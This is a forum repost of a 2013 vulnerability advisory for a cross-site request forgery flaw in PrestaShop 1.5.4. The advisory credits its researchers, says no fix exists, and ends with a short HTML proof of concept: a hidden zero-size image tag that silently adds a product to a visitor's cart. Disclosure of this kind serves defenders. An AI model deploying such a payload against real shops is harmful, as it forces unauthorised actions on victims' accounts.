Jump to content
Matt

PrestaShop 1.5.4 Cross Site Request Forgery

By Matt, in Exploituri

Recommended Posts

Matt Newbie

Matt

Posted
Posted

Description : PrestaShop version 1.5.4 suffers from a cross site request forgery vulnerability

Author : Eyup CELIK, EntPro Cyber Security Research Group

Source : PrestaShop 1.5.4 Cross Site Request Forgery ? Packet Storm

Code : 

View online: http://demo-store.prestashop.com/en/

  * Advisory ID: PRESTASHOP
  * Version: 1.5.4
  * Date: 2013-July-11
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Request Forgery

-------- DESCRIPTION  
---------------------------------------------------------


With this vulnerability, account passwords and mail adresses could be modified and also products could be added or removed remotely from the shopping cart.


-------- SOLUTION  
------------------------------------------------------------

There is no solution for this vulnerability at the moment.

-------- REPORTED BY  
---------------------------------------------------------

  * EntPro Cyber Security Research Group (www.entpro.com.tr)
    (Eyüp ÇELÝK, Ýsmail SAYGILI, Gökay BEKÞEN, Ünlü AÐYOL, Yunus Emre KARABULUT)


-------- EXPLOIT CODE  
---------------------------------------------------------


<html>
<head>
<body>
<img src="http://localhost/language/cart?add=&id_product=[Product ID]" width=0 height=0>
</body>
</head>
</html>

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...